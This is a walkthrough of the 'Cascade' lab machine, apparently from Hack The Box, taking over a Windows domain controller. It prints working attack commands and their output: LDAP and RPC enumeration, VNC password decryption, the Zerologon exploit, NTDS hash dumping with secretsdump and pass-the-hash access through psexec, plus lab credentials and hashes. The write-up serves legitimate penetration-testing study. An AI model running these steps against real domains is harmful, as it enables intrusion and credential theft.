HTB - Cascade
Machine Info
Cascade is a medium difficulty Windows machine configured as a Domain Controller. LDAP anonymous binds are enabled, and enumeration yields the password for user r.thompson, which gives access to a TightVNC registry backup. The backup is decrypted to gain the password for s.smith. This user has access to a .NET executable, which after decompilation and source code analysis reveals the password for the ArkSvc account. This account belongs to the AD Recycle Bin group, and is able to view deleted Active Directory objects. One of the deleted user accounts is found to contain a hardcoded password, which can be reused to login as the primary domain administrator.
Enumeration
Scope
IP Address: 10.10.10.182
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-10 02:05:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-10T02:05:33
|_ start_date: 2024-07-10T01:57:18
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: 5s* Open ports: 53,88,135,139,389,445,636,3268,5985
* UDP Open ports: 53- 123 - 389
* Services: DNS - KERBEROS - RPC - LDAP - SMB - winRM
* Versions: (Windows Server 2008 R2 SP1) - Microsoft DNS 6.1.7601
* Important Notes: - Domain: cascade.localDNS Enumeration
No zone transfer available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ dig axfr cascade.local @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr cascade.local @10.10.10.182
;; global options: +cmd
; Transfer failed.RPC Enumeration
Found usernames from rpc calls
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]Filter out these users and create a list of them
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croftSMB Enumeration
No data from smb
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\:
SMB 10.10.10.182 445 CASC-DC1 [-] Error enumerating shares: STATUS_ACCESS_DENIEDKerberos Enumeration
I want to check that users I found are valid on the domain, So I will verify this with Kerbrute
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ kerbrute userenum --dc $ip -d cascade.local -t 100 -o users.list ./users.lst
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/09 22:15:36 > [+] VALID USERNAME: j.wakefield@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: arksvc@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: a.turnbull@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: j.goodhand@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: r.thompson@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: d.burman@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: s.smith@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: BackupSvc@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: j.allen@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: util@cascade.local
2024/07/09 22:15:36 > [+] VALID USERNAME: s.hickson@cascade.local
2024/07/09 22:15:36 > Done! Tested 15 usernames (11 valid) in 5.263 seconds11/15 valid usernames, Let's attempt ASREP-Roasting attack against these users
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ impacket-GetNPUsers cascade.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH setI got no hash from this attack, Let's switch to ldap protocol
LDAP Enumeration
I will use
ldapsearchwith the following flags-xsimple authentication-bprincipal name-sscopesubsubtree'*'all
The output was too big, So I searched for Users section for anything might be helpful. there were a lot of users details but this user below has a different record cascadeLegacyPwd .
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ ldapsearch -H ldap://$ip -x -b "DC=cascade,DC=local" -s sub '*'
<snip>
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
<Snip>
cascadeLegacyPwd: clk0bjVldmE=It's a base64 encoding , Let's decode it in our terminal
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ base64 -d<<< clk0bjVldmE=
rY4n5evaIt might be a password for that user, Let's check with crackmapexec
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'r.thompson' -p 'rY4n5eva'
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva I also want to see if we can access the machine with winRM , but It failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec winrm $ip -u 'r.thompson' -p 'rY4n5eva'
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:rY4n5evaI will continue enumerate the domain with the credentials I found
Initial Access
Bloodhound-python
Fire up bloodhound.py and prepare the zip file for BloodHound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ bloodhound-python -u 'r.thompson' -p 'rY4n5eva' -ns $ip -d cascade.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: casc-dc1.cascade.local
INFO: Found 18 users
INFO: Found 53 groups
INFO: Found 7 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CASC-DC1.cascade.local
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ zip cascade.zip *.jsonUpload the data to bloodhound
SMB Credentialed Enumeration
List out the shares we have access to and In the next command I will crawl to the shares with Spider_plus Module
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'r.thompson' -p 'rY4n5eva' --shares -M spider_plus
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SPIDER_P... 10.10.10.182 445 CASC-DC1 [*] Started spidering plus with option:
SPIDER_P... 10.10.10.182 445 CASC-DC1 [*] DIR: ['print$']
SPIDER_P... 10.10.10.182 445 CASC-DC1 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.182 445 CASC-DC1 [*] SIZE: 51200
SPIDER_P... 10.10.10.182 445 CASC-DC1 [*] OUTPUT: /tmp/cme_spider_plusThese files took my attention, So I downloaded them to my kali machine for examination
"IT/Email Archives/Meeting_Notes_June_2018.html": {
"atime_epoch": "2020-01-15 20:08:46",
"ctime_epoch": "2020-01-15 20:08:46",
"mtime_epoch": "2020-01-28 13:00:30",
"size": "2.46 KB"
},
"IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log": {
"atime_epoch": "2020-01-10 11:19:20",
"ctime_epoch": "2020-01-10 11:19:20",
"mtime_epoch": "2020-01-28 20:19:11",
"size": "1.27 KB"
},
"IT/Logs/DCs/dcdiag.log": {
"atime_epoch": "2020-01-10 11:17:30",
"ctime_epoch": "2020-01-10 11:17:30",
"mtime_epoch": "2020-01-26 17:22:05",
"size": "5.83 KB"
},
<snip>
"IT/Temp/s.smith/VNC Install.reg": {
"atime_epoch": "2020-01-28 14:27:43",
"ctime_epoch": "2020-01-28 14:27:43",
"mtime_epoch": "2020-01-28 15:00:01",
"size": "2.62 KB"
"cascade.local/scripts/MapAuditDrive.vbs": {
"atime_epoch": "2020-01-15 16:45:08",
"ctime_epoch": "2020-01-15 16:45:08",
"mtime_epoch": "2020-01-15 16:50:14",
"size": "258 Bytes"
},
"cascade.local/scripts/MapDataDrive.vbs": {
"atime_epoch": "2020-01-15 16:50:28",
"ctime_epoch": "2020-01-15 16:49:19",
"mtime_epoch": "2020-01-15 16:51:03",
"size": "255 Bytes"┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat Meeting_Notes_June_2018.html
<snip>
<p>For anyone that missed yesterdays meeting (Im looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the Best GPO competition will be
announced on Friday so get your submissions in soon.</p>There is user TempAdmin and we need to find his password.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat VNC\ Install.reg
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
<snip>
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
6bcf2a4b6e5aca0f
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ xxd -r -p <<<6bcf2a4b6e5aca0f
k*KnZThis is encrypted password for VNC SERVER, So we need to decrypt it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo /opt/vncpwd/vncpwd pass_enc
Password: sT333ve2Confirm access
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 's.smith' -p 'sT333ve2'
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 Access the machine and get the flag
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ evil-winrm -i $ip -u 's.smith' -p 'sT333ve2'
*Evil-WinRM* PS C:\Users\s.smith\Documents> type ..\Desktop\user.txt
4701aeb4858f9ab9d7cxxxxxxxxxxxxUser Flag: 4701aeb4858f9ab9d7cxxxxxxxxxxxx
Privilege Escalation
After I solved the machine, I knew from the community the following attack path was unintended, So I added the intended path to this section, too
Unintended Path
Since, The machine release date is 2020, There is a CVE was published on the same year that allow Domain Admins rights from
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 's.smith' -p 'sT333ve2' -M zerologon
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
ZEROLOGO... 10.10.10.182 445 CASC-DC1 VULNERABLE
ZEROLOGO... 10.10.10.182 445 CASC-DC1 Next step: https://github.com/dirkjanm/CVE-2020-1472 ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ python3 /opt/CVE-2020-1472/cve-2020-1472-exploit.py CASC-DC1$ $ip
Performing authentication attempts...
========================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete! Dump the ntds database
└─$ impacket-secretsdump cascade.local/'CASC-DC1$'@$ip -no-pass -just-dc
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
cascade.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:7c2ea40b06d267f15xxxxxxxxxxxxxx:::
cascade.local\CascGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3a1b37192392d74e86d04242288dc147:::
cascade.local\arksvc:1106:aad3b435b51404eeaad3b435b51404ee:10ffc991edaa4635cf81eb91762420cb:::
cascade.local\s.smith:1107:aad3b435b51404eeaad3b435b51404ee:b48b49789458698abadc119c8e310703:::
cascade.local\r.thompson:1109:aad3b435b51404eeaad3b435b51404ee:63251f7b1bada5082e5ffb18261ba28f:::
cascade.local\util:1111:aad3b435b51404eeaad3b435b51404ee:49a914ea7201025aeff21cd858ec7d66:::
cascade.local\j.wakefield:1116:aad3b435b51404eeaad3b435b51404ee:13ae5d7704258917054d662d016eab60:::
cascade.local\s.hickson:1121:aad3b435b51404eeaad3b435b51404ee:2776416ceb426c515cab11bb8411067b:::
cascade.local\j.goodhand:1122:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\a.turnbull:1124:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\e.crowe:1127:aad3b435b51404eeaad3b435b51404ee:95d4f729c16ae37b910317d665ba2215:::
cascade.local\b.hanson:1128:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\d.burman:1129:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\BackupSvc:1130:aad3b435b51404eeaad3b435b51404ee:c27e154566c4788326fce339f4b55491:::
cascade.local\j.allen:1134:aad3b435b51404eeaad3b435b51404ee:64928a685f9a995045f8c04bbf86881d:::
cascade.local\i.croft:1135:aad3b435b51404eeaad3b435b51404ee:431682a8242a237e805badacab95b0e4:::
CASC-DC1$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<snip>Access the machine ad administrator with psexe.py
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ impacket-psexec cascade.local/administrator@$ip -hashes :7c2ea40b06d267f15xxxxxxxxxxxxxx
<snip>
C:\Windows\system32> whoami
nt authority\systemC:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
89f1c7a9f45ddf6f59cxxxxxxxxxxxxxxRoot Flag: 89f1c7a9f45ddf6f59cxxxxxxxxxxxxxx
Intended Path
After exploring the shares with crackmapexec as user s.smith, I found that he has read access on audit$ share
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 's.smith' -p 'sT333ve2' --shares
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$ READ
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ smbclient -U s.smith \\\\$ip\Audit$
smb: \> ls
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db" let's download CascAudit.exe and examine it in dnSpy.exe
The script check of provided arguments.
if (MyProject.Application.CommandLineArgs.Count != 1)
{
Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
return;
}RunAudit.bat shows the command and appropriate argument
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db" When reading the code, it has a connection string consist of username, domain name, password, So I put breakpoint on text2 to get the password
Provide the path of Audit.db as argument to make the script work properly
We got the username, domain name, and password
Confirm Access
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'arksvc' -p "w3lc0meFr31nd"
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\arksvc:w3lc0meFr31ndFrom bloodhound, the user arksvc is a member of AD RECYCLE BIN group which has access to AD Deleted Object
From HackTricks:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
<snip>
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOxxxxxxx
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=casc
ade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
We saw Tempadmin before and this record is important cascadeLegacyPwd: YmFDVDNyMWFOxxxxxxx
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ cat Meeting_Notes_June_2018.html
<snip>
Username is TempAdmin (password is the same as the normal admin account password). </p>
<snip>Decode the value we found
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ base64 -d <<<YmFDVDNyMWFOMxxxxxxx
baCT3r1axxxxxxxIf we combine the pieces together the decoded password is the password of the administrator account
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'administrator' -p 'baCT3r1axxxxxxx'
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)Get the flag
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ crackmapexec smb $ip -u 'administrator' -p 'baCT3r1aN00dles' -x "type C:\\Users\\Administrator\\Desktop\\root.txt"
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)
SMB 10.10.10.182 445 CASC-DC1 [+] Executed command
SMB 10.10.10.182 445 CASC-DC1 89f1c7a9f45ddf6f59cxxxxxxxxxxxxxxRoot Flag: 89f1c7a9f45ddf6f59cxxxxxxxxxxxxxx
Last updated